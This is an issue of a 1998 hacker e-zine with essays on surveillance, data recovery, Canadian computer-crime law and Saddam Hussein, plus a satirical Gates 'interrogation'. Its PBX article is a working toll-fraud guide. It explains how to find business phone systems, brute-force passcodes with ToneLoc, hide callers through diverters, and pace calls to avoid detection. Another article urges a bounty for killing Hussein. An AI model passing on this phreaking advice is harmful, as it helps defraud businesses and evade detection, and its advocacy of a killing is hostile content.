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"The name speaks for itself!" <20><>
Presents the
Damage, INC. Newsletter
January 1998 Issue #5
"Addictive but not lethal."
C O N T E N T S :
<EFBFBD> INTRODUCTION - An Introduction to the Damage, INC. Newsletter.
<EFBFBD> BIG BROTHER BASHING - A plastic, microchip controlled world.
<20> Search String: {BIG BROTHER}
<EFBFBD> BLACKENED'S TIP OF THE MONTH - Data recovery techniques.
<20> Search String: {BLACKENED}
<EFBFBD> CONSPIRACIES AND COVERUPS - Bill C-17: The Thought Police are here.
<20> Search String: {COVERUPS}
<EFBFBD> CORRUPTION AND GREED - Saddam Hussein: A greedy, defiant dictator.
<20> Search String: {GREED}
<EFBFBD> H/P INFORMATION AND NEWS - Phreaking information on PBXs.
<20> Search String: {NEWS}
<EFBFBD> INTERVIEWS AND INTERROGATIONS - Another Interrogation of Billy Gates.
<20> Search String: {INTERVIEWS}
<EFBFBD> LETTERS TO THE EDITOR - More feedback about the Damage, INC. Newsletter.
<20> Search String: {LETTERS}
<EFBFBD> OBJECTIVE OPINIONS - Robert Latimer; victim of cowardly inaction.
<20> Search String: {OPINIONS}
<EFBFBD> REPORTS FROM THE FRONT - Ten Tips on how to live in the New World Order.
<20> Search String: {REPORTS}
<EFBFBD> SOURCE AND SCRIPTS - Fade to Black trojan source code.
<20> Search String: {SOURCE}
<20> Search String: {WRITING}
<20> Search String: {CLOSING}
INTRODUCTION: The Damage, INC. Newsletter is more addictive than nicotine,
heroin and crack but not lethal. However, we're not responsible
in any way if you overdose on any information that we present.
Damage, INC. intends to give you a massive dose of reality in
this issue that'll trip you out... and satisfy your constant
craving for the ultimate fix. We're going to shoot you up with
the most powerful drug imaginable. It's mind altering, thought
provoking and permanent. In essence, it is the perfect drug.
To use, open your eyes wide and it'll be transferred directly
onto your retinas. Then the drug is injected through them into
your brain. The chemicals are absorbed and your mind processes
the information that it has received. The reactions vary and the
results are always different from user to user. In case anyone
doesn't know what I'm referring to, it's called reading and
comprehending what is written. The drug is ideas, opinions and
any information that makes you think. As in, reading something
that is interesting and thinking about what you've read can be
very addictive, expands your mind and is relaxing. It can also
be rewarding to learn about new techniques, methods and different
points of view.
Reading a publication like the Damage, INC. Newsletter can show
you perspectives that you had not previously considered. It
should be read and used as a source of facts, thoughts etc. that
can vastly improve a readers basis for various subjects and
topics. Damage, INC. believes that by publishing and releasing
this newsletter which informs, educates, promotes alternative
learning and thinking...that inevitably those that loyally read
it are destined to learn and grow. I am by no means speaking
exclusively about the articles that are h/p related either. For
example, the Big Brother Bashing section is just as important
since it contains valuable information that's general interest.
Also, many of our articles are often about topics that the mass
media chooses to ignore or refuses to openly discuss. They limit
themselves and censor everything. They hide from controversy and
fear truth. That is the reason that this forum was established.
Damage, INC. wanted to create a way of expressing opinions etc.
in an open manner to share thoughts and ideas with others. We're
always honest with our readers and expect people to disagree,
debate and think about what we write. All we can ask is that you
at least consider and contemplate what we've written. In fact,
you are encouraged to evaluate and ponder our words. It won't
kill you to do that. Damage, INC. is aware of the fact that
people will always have differing opinions and we accept that.
We are giving you more credit than the mass media ever will. To
them, everyone is just a zombie with money that they can exploit
in order to profit. They don't perceive us to be intelligent
individuals, but rather a group of naive, gullible idiots that
they can use and influence at will. They look at citizens as
being potential consumers with expendable income.
Always remember, ignorance is deadly. We need more enlightened,
open minded people that are willing to combat the ignorant that
exist in "society". The greatest weapon that you can possess is
being an informed person that's willing to go against the grain.
A plastic, microchip controlled world:
The world is made of plastic and microchips are everywhere. Instead of being
called Earth, it should be renamed to "The Plastic Planet". Why anyone would
refer to this as the "blue planet" is beyond me. It's more like the microchip
controlled rock that's spiralling aimlessly in orbit out of control. That is,
we are not the ones in control. In fact, plastic cards are the norm and tiny
microchips are in everything now... which makes Big Brother's job of controlling
our lives much easier. Soon Big Brother will have total control over us. Any
information that they desire will be readily available to them. Indeed, it'll
be at their proverbial fingertips. They'll be able to access literally any
data they want instantly. "How is that possible?" I'll explain. Nothing is
safe anymore. "Why not?" The advancements in technology have allowed the
impossible to become common. Gathering data on individuals was once a very
difficult task to perform. That is no longer the case. "What is wrong with
plastic cards and microchips?" I will attempt to answer all of these questions
so that you can form your own opinions about Big Brother from an informed
Microchips are now smaller and faster than ever before. We are entering a new
age. Some refer to it as being a "Brave New World" (which is a reference to
a classic book by the way). Others fear that Big Brother will abuse this new
technology. Obviously, Big Brother is already embracing and exploiting the
"Digital Revolution". Recently, I read an article on TIME Magazine's Man of
the Year: Andrew Grove. In case you are wondering, he's the chairman and CEO
of Intel. In 1947 the transistor was invented by two Bell Labs scientists in
New Jersey. Today, a single Intel Pentium II processor chip has 7.5 million
transistors on it and is able to make 588 million calculations a second. Intel
and the rest of Silicon Valley aren't just producing microchips that are to be
used in desktop computers. In fact, much of what they sell has nothing to do
with what would be deemed a computer at all. Microchips are now commonly used
in popular convenience appliances like coffee makers, toasters, rice cookers,
televisions and ovens. Those are just some examples. It has been reported that
the technology for someone to control their TV using their brain now exists.
The ubiquitous chip is also in most new cars, cameras, smart cards etc. and is
even in some pairs of running shoes and jewelry.
According to Andrew Grove, when asked about the role of technology "Technology
happens," "It's not good, it's not bad. Is steel good or bad?" Sure, Grove is
a great entrepreneur. Some might even call him a visionary for building Intel
into a company that is worth an estimated $115 billion with $5.1 billion in
annual profits. However, is he not responsible... at least to a certain extent
for how the technology that Intel creates is used? I am by no means trying to
condemn him for being financially successful. I honestly don't care how wealthy
Grove (or Bill Gates for that matter) is. I do think that they should be held
responsible for the products that they produce though. Surely, Andrew Grove, a
man that lived through the Nazi and SS regime would know how technology such
as the small, fast microchips that Intel creates can be used by Big Brother
during this era. Afterall, he was voted Man of the Year for his brilliance,
leadership and co-founding a huge company that makes nearly 90% of the planet's
PC microprocessors. He contributed to building Intel into an economic power-
house. That can't be disputed. Yet, I can't help but wonder about the future
of the microchip and how it'll be used against us. Already, they can put a
small chip into pairs of shoes that can store and exchange data. They can put
a microchip into the stomachs of animals like cows. Logic dictates that humans
will soon have microchips implanted into their bodies.
Big Brother is smiling and laughing. The collection of data is being made much
easier for them with the accepted use of plastic smart cards and microchips.
Technology isn't bad but it can be used for malicious purposes like the invasion
of someone's privacy. Personally, I want to be able to purchase items without
Big Brother having a record of every transaction I make. I don't want them to
have access to all of my financial data, medical data, be able to track my
movements, or have everything they want at their fingertips. Citizens should
have the right to privacy and freedom. I won't allow Big Brother to implant a
microchip in me. Just as, I won't use any smart cards. They aren't safe since
they contain microchips, can store and transfer data, and make it easy for Big
Brother to gain information. I suggest you think about the future, how plastic
smart cards and microchips will be used. Do you want Big Brother to have total
control over you? It is possible. Hoping that it won't become a reality or
ignoring it won't make it go away. That is the reason that nothing is safe,
secure or private anymore. Big Brother has plastic cards and silicon microchips
to thank for their greatest wish becoming possible.
Cameras are everywhere. They're mounted outside on buildings, street corners,
at intersections on traffic lights, above ATM machines etc. They are also
inside of many buildings (retail and commercial stores, offices, airports, most
banks etc.) Some cameras are well hidden and are so minuscule that they're
almost undetectable. Eventually, you won't be able to walk in an isolated,
unpopulated rural area without knowing or feeling that you're being watched.
Everything that you do will be recorded. The inside of an average Las Vegas
casino, with its hundreds of security cameras scoping out every square inch of
the establishment... panning and zooming in on gamblers could easily become the
model used by Big Brother. Afterall, why wouldn't Big Brother study the way
that casinos monitor people and then copy them? It would be extremely cost
effective for them to employ the same system(s) used by casinos elsewhere. Of
course, Big Brother would use them to track and monitor the actions of innocent
citizens for purposes of control and power. If nothing else, it is definitely
something that you should think about. Never assume that you have privacy or
take it for granted.
Written by BLACKENED <20> Damage, INC. (C)opyright 1998.
Data recovery techniques:
If you use any of these data recovery techniques, and the result is that you
lose data, Damage, INC. isn't responsible. They're just tips that should work
if they're properly applied. However, they won't remedy every catastrophic
situation. They should be followed precisely and only used when absolutely
necessary. For example, you accidentally executed a trojan and want to attempt
to recover some of the crucial, important data. Basically, you should only
use the methods below as a last resort. ;)
Now that I've established when to use these data recovery techniques, I will
now discuss certain possible situations and problems. Many newbies have asked
me how to "fix their hard drive". First, I ask them what problems they have
encountered. Usually, they reply that their hard drive "won't boot anymore".
Obviously, I tell them to try booting up their system from a bootable floppy,
switch to C:, execute FDISK /MBR (replaces the Master Boot Record), remove the
floppy and then reboot. Of course, that only repairs one problem and there
can be many. If the user ran a trojan, they will more than likely have several
other problems with their hard drives. The Media Descriptor Byte can be
invalid, the Partition Tables, FAT Tables etc. could have been altered etc.
It's possible that there's been some damage done and data loss. However, you
might be able to recover everything. Some people make the mistake of loading
FDISK and using FORMAT C: immediately. They assume that because they get the
DOS error message "Invalid drive specification" when they try to change to C:
and can't access the drive, that it means drive C: is done in. That's simply
not true. There's always a chance for data recovery. ;)
If you receive that error message, execute FDISK on a floppy disk. (Hopefully
you have a bootable MS-DOS backup disk. If you don't, I suggest you make one).
If there are NON-DOS partitions that the trojan created, delete them. If the
partition table was nuked, create a new one that is the same size as the
previous one that existed. (ie, if you have a 1 gig hard drive and it wasn't
partitioned into two drive letters, then create a new 1 gig partition). FDISK
doesn't "destroy" any data. Ignore the warning message that says all data on
the current partition will be destroyed. Don't worry, many people are under
that misconception and fear FDISK. Then reboot the system. If there are still
problems, then it's probably due to the FAT tables being destroyed. It's very
common for trojans to overwrite and corrupt the FAT tables. Basically, they're
an easy target. In case you are wondering, there are two FAT tables
(File Allocation Tables) per hard drive. The second FAT is an exact duplicate
copy of the first. In order to repair them, you'll need to use Norton Disk
Doctor (or a similar product). That is, unless you know how to manually
repair your FAT Tables etc. with a disk editor. ;) If you do, use Norton
DiskEdit or the disk editor of your choice. At any rate, that's a good way to
check out the damage that's been done... since you can view the data that has
been overwritten etc. before you decide to do anything.
Norton Disk Doctor might report many errors with your hard drive(s). It will
report any problems that it finds and prompt you to fix any areas that it
determines to be invalid. This is the final step in this data recovery
technique. There is no turning back. Do not allow Norton Disk Doctor to repair
any Partition or Boot Sector errors it may encounter because FDISK has corrected
them (if you followed my instructions properly). Allow Norton Disk Doctor to
repair errors to the Media Descriptor Byte, FAT Tables, files etc. Once Norton
Disk Doctor has completed repairs, you may have recovered all of the data... or
you may have to look for your backup disks. It all depends on what type of
damage the trojan did.
Damage, INC. has found that the best results are obtained from this technique if
the trojan hasn't damaged the hard drive's directory structure. Obviously, it
makes it much easier for Norton Disk Doctor to recover the FAT Tables etc. Good
luck, and be sure to make backups of all of your critical data.
Written by BLACKENED <20> Damage, INC. (C)opyright 1998.
Bill C-17: The Thought Police are here.
I was not able to obtain an up-to-date copy of the Criminal Code of Canada. I
found an old copy on the Electronic Frontier Foundation of Canada's web site.
I manually added the Bill C-17 (35th session) amendments by referring to the
copy I got from the Government of Canada web site. I also removed french
definitions in section 342.1 since they are useless. If there is any
misinformation, the above sources are responsible for it.
I will show you sections 342.1 and 342.2 of the Criminal Code. Section 342.1
deals with "illegal" computer usage. The altered section 342.1 is listed below.
Bill C-17 additions will be denoted with the prefix [C-17].
Unauthorized use of a computer
342.1 (1) Every one who, fraudulently and without colour of right,
(a) obtains, directly or indirectly, any computer service,
In one sense, this "anti-hacking" law is a fucking joke. However, since it is
so intentionally vague, and the Code's definition of `computer service' is so
ambiguous, it is more than enough to send you to the cop shop and beyond.
(b) by means of an electro-magnetic, acoustic, mechanical or other device,
intercepts or causes to be intercepted, directly or indirectly, any function of
a computer system
This section is extremely vague and unclear. However, I'll attempt to explain
it according to my own understanding of what is written. It's illegal to
directly or indirectly obtain access to any computer service (ISPs etc.) by
using any "device". By device, it sounds like they are referring to electro-
magnetic card readers, using a fake or stolen/fraudulent credit card (carding),
uses an acoustic (listening device/bugs etc.) to get accounts or any other
device that enables them to intercept any information relating to the function
of a computer system. Basically, you can't do shit without it being an illegal
act. As for the mechanical, any boxes, taps, etc. are illegal to use directly
or indirectly. Even if you aren't intentionally trying to do that, it is still
considered to be illegal according to the above section 342.1(b).
(c) uses or causes to be used, directly or indirectly, a computer system with
intent to commit an offence under paragraph (a) or (b) or an offence under
section 430 in relation to data or a computer system, or
If anyone intends to gain illegal access to a computer system, they can get
burned for it. This section is the bane of wannabe hackers that don't know what
the fuck they are doing. They don't gain access to a computer system, but can
potentially face the same penalty that a real hacker would.
Section 430 deals with damaging computer data to make it unintelligible, in part
or fully. Haha. Section 430 was once typed into an auto-message by a 519 sysop
in an extremely pathetic attempt to intimidate Damage, INC. All it did was make
us shake our heads... and that intimidated him. ;-)
[C-17] (d) uses, possesses, traffics in or permits another person to have
access to a computer password that would enable a person to commit an offence
under paragraph (a), (b) or (c)
Yes, you read this correctly... it is a criminal offence to possess a password
that could be used to enable a person to commit an offence listed above. Hell,
wouldn't that include every Internet user and BBSer? Fuck the laws created by
Canada's "Inner Party." You can be branded a criminal by having the *means* to
commit an offense. It is because of these laws that the encryption of sensitive
data such as passwords is extremely important...if not critical.
If two friends share a computer password it makes them both "criminals." The
first friend who owns the account would be busted under 321.1(d), and the other
friend that uses the account is charged under 321.1(a). Both are subject to the
same potential penalty listed below.
is guilty of an indictable offence and liable to imprisonment for a term not
exceeding ten years, or is guilty of an offence punishable on summary
If you were convicted of anything above, you could be put in jail for ten years
if the judge wanted to "make an example out of you" in order to "deter others."
Below are the definitions to the various terms in section 342.1. Unfortunately,
I don't have the space to criticize each term individually. It isn't a surprise
to me that these definitions are needlessly cryptic.
(2) In this section,
[C-17] "computer password" means any data by which a computer service or
computer system is capable of being obtained or used;
"computer program" means data representing instructions or statements that,
when executed in a computer system, causes the computer system to perform a
"computer service" includes data processing and the storage or retrieval of
"computer system" means a device that, or a group of interconnected or related
devices one or more of which,
(a) contains computer programs or other data, and
(b) pursuant to computer programs,
(i) performs logic and control, and
(ii) may perform any other function;
"data" means representations of information or of concepts that are being
prepared or have been prepared in a form suitable for use in a computer system;
"electro-magnetic, acoustic, mechanical or other device" means any device or
apparatus that is used or is capable of being used to intercept any function of
a computer system, but does not include a hearing aid used to correct subnormal
hearing of the user to not better than normal hearing;
"function" includes logic, control, arithmetic, deletion, storage and retrieval
and communication or telecommunication to, from or within a computer system;
"intercept" includes listen to or record a function of a computer system, or
acquire the substance, meaning or purport thereof.
[C-17] "traffic" means, in respect of a computer password, to sell, export from
or import into Canada, distribute or deal with in any other way.
Section 342.2 is listed below. This section is another Bill C-17 addition.
342.2 (1) Every person who, without lawful justification or excuse, makes,
possesses, sells, offers for sale or distributes any instrument or device or
any component thereof, the design of which renders it primarily useful for
committing an offence under section 342.1, under circumstances that give rise
to a reasonable inference that the instrument, device or component has been
used or is or was intended to be used to commit an offence contrary to that
(a) is guilty of an indictable offence and liable to
imprisonment for a term not exceeding two years; or
(b) is guilty of an offence punishable on summary
This is yet another disturbing section of the Criminal Code. It is a conspiracy
to make it a criminal act to possess or share knowledge that could be used to
commit an offense under 342.1. The only way a person could get off is to
attempt to prove that a person charged under 342.1 didn't get the means to
perform the "criminal act" from them. Also, what is a "instrument, device or
component?" under this section? A h/p/a/c/v/t BBS? The Damage, INC.
Newsletter? A conversation intercepted by Big Brother and the Thought Police?
It all depends on a judge's interpretation of 342.2.
Did you notice the words "without lawful justification or excuse" at the
beginning of section 342.2? My interpretation of that phrase is this is a
loophole for the police. They can "make, possess, sell, offer for sale or
distribute any instrument or device" in order to access a suspect's computer
system, etc.
Section 342.2(2) (not listed) pertains to the forfeiture of "instruments or
devices" that were used under subsection (1). In the name of "Her Majesty,"
the police can use a convict's equipment, or have an auction to finance their
next staff party. Of course that is in addition to the two year prison
This concludes our look at Criminal Code section 342. It is much more than
busting a hacker that gets caught. It is a conspiracy to imprison all of us
"dissidents" that have the means and knowledge to commit an offense under 342.1
or 342.2. Busting a 16 year-old kid under section 342 is one thing, but they
can't stop intelligent, experienced hackers. That is the fact that they are
attempting to coverup in a lame attempt to make computer service providers
(like ISPs) feel "secure." Intimidation doesn't work Big Brother! ;-)
Written by Shatazar <20> Damage, INC. (C)opyright 1998.
Saddam Hussein: A greedy, defiant dictator:
The Gulf War ended many years ago, yet Saddam Hussein is still in power. He
not only controls Iraq and its people, he's still considered to be a powerful,
influential leader in the Middle East. Saddam Hussein continues to make
threats against the United States and is as defiant as ever. Hussein won't
comply with the U.N. resolutions and is blocking the weapons inspection teams.
Some are calling for an assassination of Hussein. They want Clinton to issue
the order to kill Saddam. Others are advising that a military strike is needed.
A final showdown seems inevitable.
Obviously, Hussein is an enemy and a threat to the world that cannot be ignored
by other nations. He still has biological and chemical weapons hidden in Iraq.
His willingness to use them can't be questioned, since he used mustard gas
against his own people in the past. We also know that he has Anthrax (an
estimated 400 kg, one gram can kill millions), vast quantities of VX nerve gas,
Botulinum (a potent toxin that paralyzes the victim) and Aflatoxin. Hussein
has the ability to produce more Anthrax etc. He's not stockpiling chemical
and biological weapons for nothing. Hussein intends to unleash them against
his enemies. The most likely scenario would be for him to target a U.S. city
and use terrorists to deliver the weapons. In other words, he wouldn't just
launch a SCUD missile or attack through any obvious means. Saddam Hussein knows
that he doesn't have the military power to defend against or defeat the U.S.
with conventional weapons, so he's developed other methods.
Personally, I don't think that Clinton is strong enough to follow through and
take out Hussein's ability to wage war. He has enough problems of his own
with his presidency. I don't want this article to be all about weapons, the
possibility of air strikes and military action against Iraq etc. though. The
main reason that I wanted to write this article is to describe Hussein's greed,
corruptness and defiance. The mass media just isn't doing a good enough job of
exposing Saddam Hussein so that people can see his true colors.
Hussein has been reported to own at least 17 different palaces in Iraq. He
hoards the profits that are made from exporting oil (Iraq's only real natural
resource). His people have been hurt more by him than by the sanctions against
Iraq. The Iraqi people were poor before the Gulf War, and they'll remain that
way as long as their corrupt leader Saddam Hussein is in power. Of course,
the Iraqi's fear Hussein and are forced to participate in public rallies of
support, as well as being human shields and protect him. Hussein is an
extremely paranoid dictator that moves constantly from place to place, uses
body doubles, uses chemical analyzers on his food before eating, has killed
many close associates, brother in-laws and many others. He uses fear to make
sure nobody will try to assassinate him. Hussein also has his own security
force. Several coup attempts have been made since 1991, but all of them have
been stopped. Basically, Hussein will do anything in order to stay in power.
He'll kill anyone that opposes him. He's willing to watch his own people starve
while he is driven around in expensive Mercedes cars from palace to palace.
Saddam is a very greedy man that has spent billions of dollars on himself. He
profits from everything that is sold in Iraq.
Iraq's Deputy Prime Minister Tariq Aziz (Hussein's personal media spokesman
would be a more suitable title) was quoted as saying "After seven years of
sanctions, you get desperate...another wave of missiles makes no difference to
the Iraqi people or the Iraqi government." That's Saddam Hussein's defiance
speaking, since Aziz is just one of his puppets. Hussein doesn't give a fuck
if his people are bombed. He'll be hiding in one of his concrete bunkers, safe
and sound with a smile on his face.
Baghdad is plastered with posters of Saddam Hussein. His use of propaganda
is legendary and should be the classic model for all dictators. "BUSH IS
CRIMINAL" is written under a mosaic of former President Bush on the marble floor
of the al-Rasheed Hotel in Baghdad. Inside is a sign that reads "DOWN DOWN
AMERICA. USA COUNTRY OF TERRORISM". Hussein loves slogans that bash the
United States, but then why does he promote terrorism? Why does he use Iraqis
as human shields? Why does he force them to chant and praise him? Why can't
he allow free elections? It's because he is greedy, corrupt and afraid. There
can be no other answer. He's driving his country towards another war, in which
Iraq cannot win. He knows that, but he's willing to sacrifice thousands of
lives for nothing. Saddam Hussein is a defiant, insane dictator that will stop
at nothing to prove himself to the world. He's been on a huge power trip for
years now. The only way to stop him is to kill him. That is what should be
done. That is what must be done before he's allowed to use his weapons of mass
destruction. He's already managed to get support from several countries
(France, Russia, China), so it's up to the United States to take him out. In my
opinion, a large bounty should be offered for Hussein's head. Money talks and
greed can be used to eliminate greed for the common good. Now is the time to
end his reign of greed and corruption. It is time to send a message to the
world that defiant dictatorships won't be tolerated anymore.
Written by Blackie Lawless <20> Damage, INC. (C)opyright 1998.
Phreaking information on PBXs:
This article will discuss the basics of PBXs and is intended for newbie phreaks
to read and learn from. PBX is an acronym for Private Branch eXchange. From
this point on, I will refer to them as PBXs for simplicity. They are quite
common in most area codes. Obviously, some exchanges will have more PBXs than
others since they contain a lot of businesses that use them. Most large (and
some small) businesses use them because it eliminates the need for many incoming
phone lines. The PBX has extensions that can be located in various offices
throughout a building. Have you ever worked or been in an office with phones
that have numbered buttons? Some are lit up and others aren't in use. Usually,
you have to press one of the extension buttons, press 9 and then dial out.
Most PBXs have passcodes that are 4+ digits. They can be hacked by ToneLoc,
another code hacker or manually. They aren't the same as extenders. I'm not
even going to discuss 1-800 extenders, 950s or any LD carriers in this article.
However, you can use a PBX to call ld which is what they are most commonly used
for. Unlike 1-800 extenders, many PBXs don't have ANI (Automatic Number
Identification) so they're relatively safe to hack and use if you know what you
are doing. First, phreaking safely involves more than just downloading a copy
of ToneLoc and scanning 1-800-XXX-XXXX from home like a stupid lamer. :)
You should start off by finding some local PBXs. This doesn't require a lot of
knowledge to do. You could do some social engineering if you don't want to
spend hours scanning for tones. For example, many stores like WAL-MART etc.
have a PBX system. They're also great places to use for scanning 1-800s, but
I'll save that for another article though. Anyways, if you're standing alone
by a phone in WAL-MART take a good look at it. If the phone number is written
on the card, write it down. If the extension buttons are labelled, write those
numbers down. Try dialing out. Usually that requires dialing either a 9, * or
# before the number you want to call. It's how you get a dial tone. Some PBXs
need the passcode before you can try to dial out. Others need a valid passcode
entered after you dial 9, * or #. PBXs aren't all the same. There are many
different types that you will need to learn about. Just as, you'll have to
determine the number of digits the passcode is before you attempt to hack it.
The best way to do that is to experiment with the PBX by hand dialing it from a
phone. If it's a 1-800 PBX, you can use a pay phone. If it's a local PBX, just
use a phone at a store or dial from home through a diverter. Make sure you're
using a good diverter by checking it with an ANI first. You can also call the
extensions of PBXs. For example, if you are in WAL-MART and have access to a
phone you can push a button or dial the extension number. The ways in which to
do that vary. Try dialing "100" or "#100". Or remotely, dial ACN+XXX-XXXX then
"100" or whatever extension you want. The first is how the employees call from
desk to desk. The second is how you can call someone directly at their desk if
you know their extension number. It's fairly simple. I'm sure you've seen
commercials on TV that give a 1-800 number and an extension to talk to a sales
rep or operator number. That's just an example. 1-800 PBXs, Voice Message
Systems etc. are very prevalent these days with companies and are easy to find
on packages, in magazines etc.
Businesses use PBXs to save money and to make things more convenient and
efficient for their employees. For example, if Joe Lamer works at a company
and he needs to make long distance business calls from home at night... he can
dial out through the company's PBX and the ld will be billed to the company.
That way, he doesn't have to pay for making business calls from home, use a
calling card, or go through the hassle of getting his phone expenses paid for
each month. (ie, the company doesn't have to go through his phone bill every
month and repay him for the ld business calls he's made). Basically, it makes
things simpler. This not only benefits Joe Lamer, but also us phreaks. We can
find the PBX, hack it, and use it to call ld. :) If you do find and hack a
local PBX, don't abuse it by making hundreds of ld calls. Even if they don't
have ANI and don't trace you, it is best to use the PBX sparingly. That way,
you won't get caught and it will last (won't change, nobody will notice, they
won't get ANI etc.) In other words, don't make 1,000 ld calls per month using
a PBX to different area codes all over the world. Make a few calls through the
PBX per month and it won't get noticed. That way, you won't be detected and
will be able to call ld for free using it. There are also some other things
that you should keep in mind. For example, use ToneLoc cautiously when scanning
and hacking PBXs. If you're trying to hack a 5 digit passcode, don't allow
ToneLoc to make 1,000 attempts in one session/night. Don't scan or hack
sequentially either. Don't be paranoid, just eliminate any obvious methods and
use common sense when hacking or phreaking. If you're desperate and want to
do something like scan 1-800s from home, hand dial using a phone. Pick random
numbers. Look for different tones, ringbacks, dial tones or anything that gives
a unique result. You might find a few VMBs, ANIs, extenders etc. Write down
all of the numbers you dialed and work on hacking the useful ones later. Alter
the amount of time between your dials and limit yourself to calling ten 1-800s
or so in a night. That makes it less suspicious. Don't use any patterns while
dialing that can be picked up. Use as much randomization as possible. If you
try to scan too many 1-800s at a time, you'll get busted eventually. Avoid
calling the 1-800s again that are of no use to you. It's also a good idea to
divide the numbers you want to scan with another phreak that you trust and work
together. That way, you don't have to scan for quite as long, can get just as
many codes and it's safer. Extenders usually tell you what to do like "Enter
your passcode", as do some diverters. Some are vague and don't give you as many
prompts and instructions. Use your imagination, logic and be creative. If you
already have some phreaking experience, try using what has worked for you in the
past in order to hack them. Listen to the tones and beeps carefully. They can
give you hints as to what is required (passcode, ACN, the order, how long the
passcode is). Usually you're given a few seconds more than required to enter a
passcode. So, that's how you can determine the amount of digits. Many
extenders will give an error message "That passcode is invalid." PBXs can vary
since there's more than one type. That makes it difficult to explain everything
in one short article. I won't discuss access levels, admin, digital switches
etc. in this article, nor will I give information about specific PBX systems.
There are some major differences between extenders and PBXs. Many extenders are
1-800s and have ANI, or can only call certain area codes or exchanges. That can
be limiting if the extender only reaches your own area code or an exchange in
it. Most PBXs can usually reach any area code. They can be used to call
outside of your area code, to different countries, or the entire world. Some
have call block enabled to prevent 1-900 numbers etc. from being dialed, but
other than that PBXs are generally far reaching. :)
Once you have a PBX, have a valid passcode and are ready to use it there are
a few precautions that you should take. If your codes are stored in a text
file, encrypt it. Don't keep pieces of paper containing codes lying around.
Also, don't post codes in public message bases on boards, sell them, give them
out to everyone you know to use etc. That is, unless you want the code to
stop working or even better, get busted by the cops. More than likely, I will
write about PBXs again in a future issue of the Damage, INC. Newsletter. There
is just too much information to cover in a single article...and I don't want
to overwhelm the newbies. Hehe.
In summary, this should give you the basics of PBXs and get you started. I'd
like to thank BLACKENED for suggesting that I write this article and for giving
me some ideas and inspiration. Perhaps I will share some of my phreaking
experiences with readers too. I also want to write about VMBs etc. (some have a
PBX). If you have any suggestions, leave me Email on AJFA. If it relates to
h/p, then I'll probably decide to use it. Then everyone that wants to know that
information and reads my article will benefit.
Written by Blackie Lawless <20> Damage, INC. (C)opyright 1998.
Another Interrogation of Billy Gates: The saga continues.
<B> = BLACKENED <G> = Billy Gates
<BL> = Blackie Lawless <R> = Receptionist
<S> = Shatazar <M$L> = Micro$oft Lackey
<B> - (Dialing 1-800-MS-SUCKS then #LAME for Billy Gates' extension).
<R> - Hello? This is Microsoft HQ... Miss Nicholas speaking. Please state
your business and I'll try to assist you.
<B> - This is Damage, INC. I demand to speak with Billy Gates immediately.
He knows who we are, so don't try to push the security panic button or
stonewall us... like you usually do.
<R> - Yes sir. I'll put you through to Mr. Gates immediately.
<BL> - Hahaha... gotta like the fear in her voice. <BFG>
<G> - Billy Gates speaking, What do you want me to do today?
<B> - This is Damage, INC. and we want to cheapshot you... today and everyday.
Hahaha. How'd you like reading our last interrogation of you?
<G> - Oh, it's you Mr. Blackened. I thought my security would stop you from
disturbing me from my plans and my "vision" to take over the world. I didn't
enjoy being interrogated and humiliated. Unfortunately, my multi-million
dollar security force couldn't track you guys down so I could destroy you all.
<B> - Destroy Damage, INC.? Hahaha! Billy, you must be fucking dreaming
again. <SH> at Gates. Your "security" (said very sarcastically) is a joke.
I'm calling through your 1-800-MS-SUCKS PBX. You don't even have an ANI.
If you try to trace my call... you won't be successful since I'm calling
through a 1-800-MS-BLOWS diverter anyways. ;) Your vision is to fill your
pockets with as many zombie dollars as possible. That's the extent of your
lame plan to take over the world.
<BL> - This is Blackie Lawless.. Billy boy. Haha. You probably didn't expect
Damage, INC. to call you using teleconferencing. I've got a few questions for
"your lameness". How do you like the court's decision to stop you from
including Micro$hit Explorer with Windoze 95/98? What are you going to do
now Billy?
<G> - Ah, er, uhm, well Mr. Lawless, you don't have a very nice attitude, and
you don't mince words... a quality in which I don't share in. As for the
Explorer, I thought I could fight the US Government and I assumed they would
back down. However, when they started fining me and taking away precious
Microsoft Monies, it ate me alive. I decided to revert to my cowardly,
conniving ways and beat a hasty retreat. I'll hide in the shadows, and will
try to sneak Explorer in a few years down the road when the zombies aren't
<B> - Hahaha. Damage, INC. will be around to stop you though. Just as, all
of your neighbours know that Micro$hit sucks... now that it's spray painted
on your precious lawn at your Seattle "retreat". We'll do anything in our
power to make people aware of your schemes and scams... and take money away
from you at every opportunity. By the way, your little Micro$oft Network is
currently down. You better get your "internet experts" working on the
servers. Haha. They'll soon find out that there's a nice, stealthful virus
that is infecting them... courtesy of Damage, INC. ;)
<BL> - Haha. Yeah, and it's too bad you don't like my attitude Billy. That's
really too fucking bad. It's also a shame that most of Micro$oft's software
in Chicago has been infected as well. ;)
<S> - Yeah Gates, you pathetic weasel. This is Shatazar of Damage, INC. Your
totally outclassed and outnumbered by Damage, INC. If you are afraid of losing
$1 million per day, you'll be really done in when Damage, INC. destroys you.
<G> - What? <sob> You bad guys vandalized my artificial cybergrass lawn with
computer controlled growth mechanisms? You meanies! And the Microsoft Network
is damaged? That is nothing new. My experts lack the tremendous vision that
I have. Plus I don't have the money to invest in better servers, so they'll
have to try to recover from your attack. I still have some faith in my well
paid lackeys. As for the people in Chicago getting infected software, that
doesn't mean anything. Windows 95 is preprogrammed with a life cycle, so that
my zombie customers will by new version after new version without question.
They keep giving me money for such tremendously graphical software. As for my
money, I need it so I couldn't afford the fine. I'll have to take my chances
against Damage, INC. I can always buy my way out. Tehehe.
<B> - Listen you fucking geek, I told you the last time that you ain't seen
nothin' yet. I meant exactly what I said. You won't recover from our
attacks. Your paid lackies are no match for Damage, INC. Winblows 95 is just
and overrated, inefficient, hard drive hogging, memory wasting piece of
shit... that crashes daily. It's programmed in Visual Basic for fuck sakes.
Take your chances? What the fuck are you talking about? Do you think that you
can play the odds or go with the odds? Hahaha.
<R> - Mr. Gates, I've just received an important memo. Microsoft's stock has
just fallen over 10 points in the stock exchange. The rest of the stock
market seems oblivious to our crash and is doing quite well. Could it be that
Damage, INC. is involved in some way? (conversation heard in the background).
<BL> - Hahaha! I heard that! ;) Damage, INC. is *definitely* involved. Our
plan is working perfectly... and soon Micro$oft stock will be worthless. I
love it.
<B> - I warned you Gates. Now what do you have to say Billy? Are you going
to spew more rhetoric and mince words? Hahaha.
<S> - Yeah Gates, how do you like them `apples.' Damage, INC. did a `Job' on
you. Hahaha.
<G> - Ohnonono! What has happened to my company, built on influence and
deceit? My vision has been abandoned by the blind masses! No longer can I
dream of having Windows on every computer screen, cell phone, and toaster!
Why? Why has it all gone wrong? Why has Damage, INC. destroyed Microsoft? I
